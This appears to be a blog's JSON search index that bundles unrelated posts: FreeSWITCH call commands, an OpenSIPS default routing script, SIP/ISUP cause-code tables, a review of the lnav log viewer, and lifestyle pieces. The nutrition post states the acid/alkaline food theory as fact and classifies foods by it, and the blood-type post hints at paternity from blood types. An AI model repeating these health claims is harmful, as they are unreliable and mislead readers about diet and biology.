#经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.7 经过特定SIP服务器 #经过特定的SIP服务器发起外呼,下面的命令会将INVITE先发送到192.168.2.4:5060上 bgapi originate sofia/external/8005@001.com;fs_path=sip:192.168.2.4:5060 \u0026amp;echo 2.8 忽略early media originate {ignore_early_media=true}user/1000 \u0026amp;echo 2.9 播放假的early media originate {transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.10 立即播放early media originate {instant_ringback=true}{transfer_ringback=local_stream://moh}user/1000 \u0026amp;echo 2.11 设置外显号码 originate {origination_callee_id_name=7777}user/1000 通道变量将影响呼叫的行为。fs的通道变量非常多,就不再一一列举。具体可以参考。下面的链接\nhttps://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables#app-switcher https://freeswitch.org/confluence/display/FREESWITCH/Channel+Variables+Catalog ","permalink":"https://wdd.js.org/freeswitch/fs-cli-example/","summary":"1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.","title":"fs_cli 例子"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;working_mode_preset\u0026#34;, \u0026#34;single-instance-no-db\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure to enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } # absorb retransmissions, but do not create transaction t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Relay Forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/default/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.","title":"默认脚本"},{"content":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。\n","permalink":"https://wdd.js.org/posts/2020/04/pgwzdz/","summary":"之前在百毒搜索了一下营养师考证,然后最近就经常收到骚扰电话,咨询我是否有意参加考试。\n在没有留任何电话号码的情况下,我的手机号就被精准的定位到。可想而知个人隐私问题是多么严重。\n以前只有皇帝一个人穿透明新装,现在每个人都穿着这件衣服。","title":"大数据时代的平民新装"},{"content":" 之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。\n","permalink":"https://wdd.js.org/posts/2020/04/vhovyr/","summary":"之前看过一个报道,父亲发现儿子的血型和自己以及妻子的血型都不一样,怀疑儿子不是自己亲生的,最后把自己妻儿弄死了。但是孩子的DNA检测显示是自己亲生的。\n这是一个不懂血型相关知识的悲剧啊。\n血型是由红细胞表面的两种抗原决定的。\nA抗原 B抗原 血型 1 0 A 0 1 B 1 1 AB 0 0 O 下图的表格是父母血型与子女血型的可能性与比例。\n父母血型 子女可能有血型及比例 子女不可能有血型 O、O O A、B、AB O、A O、A (1:3) B、AB O、B O、B (1:3) A、AB O、AB A、B (1:1) O、AB A、A O、A (1:15) B、AB A、B A、B、AB、O (3:3:9:1) — A、AB A、B、AB (4:1:3) O B、B O、B(1:15) A、AB B、AB A、B、AB(1:4:3) O AB、AB A、B、AB(1:1:2) O 虽说孩子的血型不一定和父母的血型相同。但是如果父母都是O型血,生出的孩子如果不是O型,那么不是亲生的可能性也是蛮大的。","title":"孩子血型一定和父母血型相同吗?"},{"content":"大多数人可能由下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:还有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铝的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 ","permalink":"https://wdd.js.org/posts/2020/04/ly7nlv/","summary":"大多数人可能由下面的两种方式去判断食物的酸碱性\n舌头👅。用嘴巴尝一下,酸的食物就是酸性的。 ph值。可以用ph试纸 以上两种判断食物酸碱性的方法都是错误的。 食物的酸碱性,取决于食物中含有矿物质的种类和含量。\n碱性食物:含有钠、钾、钙、镁、铁 酸性食物:还有磷、氯、硫 从元素周期表中也可以看出来,酸碱性相同的物质基本都是比较靠近的。\n含有钠钾钙镁铝的食物,进入人体之后,在人体的氧化作用下,最终代谢产物呈现碱性。\n另外,大部分的水果,例如柠檬、橙子、苹果这种的,吃起来是酸的,而实际上他们是碱性食物。\n食物分类表\n项目 举例 强酸性食物 牛肉、猪肉、鸡肉、金枪鱼、牡蛎、比目鱼、奶酪、米、麦、面包、酒类、花生、核桃、糖、饼干、啤酒等 弱酸性食物 火腿、鸡蛋、龙虾、章鱼、鱿鱼、荞麦、奶油、豌豆、鳗鱼、河鱼、巧克力、葱、空心粉、炸豆腐等 强碱性食物 茶、白菜、柿子、黄瓜、胡萝卜、菠菜、卷心菜、生菜、芋头、海带、柑橘、无花果、西瓜、葡萄、板栗、咖啡、葡萄酒等 弱碱性食物 豆腐、豌豆、大豆、绿豆、竹笋、马铃薯、香菇、蘑菇、油菜、南瓜、芹菜、番薯、莲藕、洋葱、茄子、萝卜、牛奶、苹果、梨、香蕉、樱桃等 ","title":"食物的酸碱性的误解"},{"content":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟而。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅\n","permalink":"https://wdd.js.org/posts/2020/03/wyeo4w/","summary":"大学,编程之师作业,曰:xxx功能,至少代码三千行。\n室友呕心沥血,废寝忘食,东拼西凑。奈何凑到代码一千行。\n友不释然,怏怏不乐。求助于我。\n于告知曰:此事易尔!但需可乐两瓶、瓜子两包。\n友悦之,曰:请稍等,片刻回。\n友即回,代码亦成。\n友黯然道:子之功力,无不及也。\n于笑曰:无他,但手熟而。\n多加注释多换行,一不留神三千行。\n😂😂😂😂🤣🤣🤣🤣😅😅😅😅","title":"代码增肥赋"},{"content":"","permalink":"https://wdd.js.org/posts/2020/03/eaikcr/","summary":"","title":"devicemap 驱动模式修改"},{"content":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。\n","permalink":"https://wdd.js.org/posts/2020/03/wikbh8/","summary":"lnav, 不需要服务端,不需要设置,仍然功能强大到没有朋友。\n速度与性能 lnav是一个可以运行在终端上的日志分析工具。功能非常强大,如果grep和tail等命令无法满足你的需求,或许你可以尝试一下lnav。\nlnav的官方仓库是https://github.com/tstack/lnav,在mac上可以使用 brew install lnav 命令安装这个命令。\n在我的4C8G的Macbook Pro上,打开一个2.8G的日志文件到渲染出现,需要花费约40s,平均每秒载入超过70MB。载入日志和渲染时,使用了接近100%的CPU。渲染完毕,使用1.2G的内存空间。\n总之呢,这个工具载入日志的速度很快。但是最好不要再生产环境上使用这个命令载入过大的日志文件,否则可能造成系统资源消耗太大的问题。\n在载入2.8G的日志文件后(3200多万行),过滤时显得非常卡顿,但是查看日志并不卡顿。\n在lnav的搜索关键字,下次打开其他日志时,lnav会自动搜索这个关键词。这是它的Session记录功能,可以使用Ctrl+R重置Session。\nlnav的特点\n语法高亮 各种过滤条件 多关键词过滤 各种快捷跳转 自带统计和可视化功能,比如使用条形图展示单位时间内的报错和日志数量 自动日志格式检查。支持很多种日志格式 能够按照时间去过滤日志 TAB自动补全 实时操作 支持SQL语法查日志 支持文件导出成其他格式 支持直接打开tar.gz等压缩后的日志文件 支持很多快捷键 x下面是按天的日志统计,灰色是普通日志,黄色是告警日志,红色的错误日志。三种颜色叠加的长度就是总日志。时间跨度单位也是可以调节的。最大跨度是一天,最短跨度是1秒。\n仍然是日志格式 自动日志格式检测 系统日志 Web服务器访问日志 报错日志 等等 过滤 可以设置多个过滤规则 时间线过滤 精确时间的日志 上个小时,下个小时 上一分钟,下一分钟 能够按照时间去追踪日志\n按照时间周期统计 统计每秒出现的错误,告警和总日志的量 语法高亮 Tab键自动补全 参考 https://lnav.readthedocs.io/en/latest/ 如果你更喜欢GUI工具,那也可以试试https://github.com/nickbnf/glogg 后记 最近因为工作需要,每天都会去排查很多的日志文件。我也曾想过装ELK之类的工具,但是我收到是文件。日志文件要转存到ELK中也要花功夫。另外ELK也是非常耗费资源的。ELK部署到一半我就果断放弃了。\n与其南辕北辙,不如回归本质。找些命令行的小工具直接分析日志文件。","title":"命令行日志查看神器:lnav"},{"content":"图解包在TCP/IP各个协议栈的流动情况\n点击查看【undefined】\n","permalink":"https://wdd.js.org/network/mlepcg/","summary":"图解包在TCP/IP各个协议栈的流动情况\n点击查看【undefined】","title":"网络包的封装和分用"},{"content":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","permalink":"https://wdd.js.org/opensips/tools/wireshark-sip/","summary":"1. 打开wireshark,并选择网卡 在过滤条件中输入sip 2. 选择电话-\u0026gt; VoIP Calls 3. 选中一条呼叫记录-\u0026gt;然后点击 Flow Sequence 4. 查看消息的详情 ","title":"Wireshark SIP 抓包"},{"content":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","permalink":"https://wdd.js.org/network/ip-protocol/","summary":"IP协议格式 字段说明 Protocol 表示上层协议,也就是传输层是什么协议。\n只需要看Decimal这列,常用的有6表示TCP, 17表示UDP, 50表示ESP。\n用wireshark抓包的时候,也可以看到Protocol: UDP(17)\n参考 https://tools.ietf.org/html/rfc791 https://tools.ietf.org/html/rfc790 https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers ","title":"IP协议 Protocol"},{"content":" ","permalink":"https://wdd.js.org/network/ibhy8a/","summary":" ","title":"从飞机航线讲解网络分层"},{"content":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。\n","permalink":"https://wdd.js.org/fe/copy-as-curl-and-copy-response/","summary":"网页上的报错,一般都会和HTTP请求出错有关。 在Chrome浏览器中,按F12或者command+option+i可以打开Dev tools,在网络面板中可以找到报错的的HTTP请求。\n通过提交Copy as cURL 和 Copy response的内容,就会非常准确的把问题报告给开发。开发也会非常快速的定位问题。","title":"Copy as CURL and Copy Response"},{"content":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","permalink":"https://wdd.js.org/posts/2020/02/edtzzx/","summary":"1. 选肉 **猪肉,肥瘦相间的五花肉才最好吃。**精瘦肉吃起来会太柴,太肥的肉会显得太腻。五花肉则刚刚好,不柴也不腻。\n2. 炒干 烧好的猪肉中如果有生水的味道,则口感不好,而且会显得肉不够熟。\n3. 具体步骤 五花肉洗净,切片。放入干净的炒锅中,然后开火烧 将五花肉的水分烧干,并且冒油,肉面发黄 放入姜葱蒜,小米椒,加入生抽,料酒,食盐爆炒。如果猪油比较少,则可以放入适量食用油 然后可以按需加入蔬菜。例如花菜、或者芹菜、或者小青椒 炒到蔬菜9成熟,然后出锅 ","title":"如何烧肉才好吃"},{"content":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available (National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code. the cause value received in the H.225.0 message is unknown in ISUP, the unspecified cause value of the class is sent.(=) ANSI procedure SIP to ISDN Response received Cause value in the REL.\nSIP Status Code ISDN Map 400 - Bad Request 41 – Temporary failure 401 - Unauthorized 21 – Call rejected (*) 402 - Payment required 21 – Call rejected 403 - Forbidden 21 – Call rejected 404 - Not Found 1 – Unallocated number 405 - Method not allowed 63 – Service or option unavailable 406 - Not acceptable 79 – Service/option not implemented (+) 407 - Proxy authentication required 21 – Call rejected (*) 408 - Request timeout 102 – Recovery on timer expiry 410 - Gone 22 – Number changed (w/o diagnostic) 413 - Request Entity too long 127 – Interworking (+) 414 - Request –URI too long 127 – Interworking (+) 415 - Unsupported media type 79 – Service/option not implemented (+) 416 - Unsupported URI Scheme 127 – Interworking (+) 402 - Bad extension 127 – Interworking (+) 421 - Extension Required 127 – Interworking (+) 423 - Interval Too Brief 127 – Interworking (+) 480 - Temporarily unavailable 18 – No user responding 481 - Call/Transaction Does not Exist 41 – Temporary Failure 482 - Loop Detected 25 – Exchange – routing error 483 - Too many hops 25 – Exchange – routing error 484 - Address incomplete 28 – Invalid Number Format (+) 485 - Ambiguous 1 – Unallocated number 486 - Busy here 17 – User Busy 487 - Request Terminated \u0026mdash; (no mapping) 488 - Not Acceptable here \u0026mdash; by warning header 500 - Server internal error 41 – Temporary Failure 501 - Not implemented 79 – Not implemented, unspecified 502 - Bad gateway 38 – Network out of order 503 - Service unavailable 41 – Temporary Failure 504 - Service time-out 102 – Recovery on timer expiry 505 - Version Not supported 127 – Interworking (+) 513 - Message Too Large 127 – Interworking (+) 600 - Busy everywhere 17 – User busy 603 - Decline 21 – Call rejected 604 - Does not exist anywhere 1 – Unallocated number 606 - Not acceptable \u0026mdash; by warning header 参考 https://www.dialogic.com/webhelp/BorderNet2020/1.1.0/WebHelp/cause_code_map_ss7_sip.htm ","permalink":"https://wdd.js.org/opensips/ch9/isup-sip-isdn/","summary":"ISUP to SIP ISUP Cause Value SIP Response Normal event 1 – unallocated number 404 Not Found 2 – no route to network 404 Not Found 3 – no route to destination 404 Not Found 16 – normal call clearing \u0026mdash; (*) 17 – user busy 486 Busy here 18 – no user responding 408 Request Timeout 19 – no answer from the user 480 Temporarily unavailable 20 – subscriber absent 480 Temporarily unavailable 21 – call rejected 403 Forbidden (+) 22 – number changed (s/o diagnostic) 410 Gone 23 – redirection to new destination 410 Gone 26 – non-selected user clearing 404 Not Found (=) 27 – destination out of order 502 Bad Gateway 28 – address incomplete 484 Address incomplete 29 – facility rejected 510 Not implemented 31 – normal unspecified 480 Temporarily unavailable Resource unavailable 34 – no circuit available 503 Service unavailable 38 – network out of order 503 Service unavailable 41 – temporary failure 503 Service unavailable 42 – switching equipment congestion 503 Service unavailable 47 – resource unavailable 503 Service unavailable Service or option not available 55 – incoming calls barred within CUG 403 Forbidden 57 – bearer capability not authorized 403 Forbidden 58 – bearer capability not presently available 503 Service unavailable 65 – bearer capability not implemented 488 Not Acceptable here 70 – Only restricted digital information bearer capability is available (National use) 488 Not Acceptable here 79 – service or option not implemented 501 Not implemented Invalid message 87 – user not member of CUG 403 Forbidden 88 – incompatible destination 503 Service unavailable 102 – Call Setup Time-out Failure 504 Gateway timeout 111 – Protocol Error Unspecified 500 Server internal error Interworking 127 – Internal Error - interworking unspecified 500 Server internal error (*) ISDN Cause 16 will usually result in a BYE or CANCEL(+) If the cause location is user then the 6xx code could be given rather than the 4xx code.","title":"ISUP SIP ISDN对照码表"},{"content":"帮助文档 Usage: rtpengine [OPTION...] - next-generation media proxy Application Options: -v, \u0026ndash;version Print build time and exit \u0026ndash;config-file=FILE Load config from this file \u0026ndash;config-section=STRING Config file section to use \u0026ndash;log-facility=daemon|local0|\u0026hellip;|local7 Syslog facility to use for logging **-L, \u0026ndash;log-level=INT ** Mask log priorities above this level 取值从0-7, 7 debug 6 info 5 notice **-E, \u0026ndash;log-stderr ** Log on stderr instead of syslog \u0026ndash;no-log-timestamps Drop timestamps from log lines to stderr \u0026ndash;log-mark-prefix Prefix for sensitive log info \u0026ndash;log-mark-suffix Suffix for sensitive 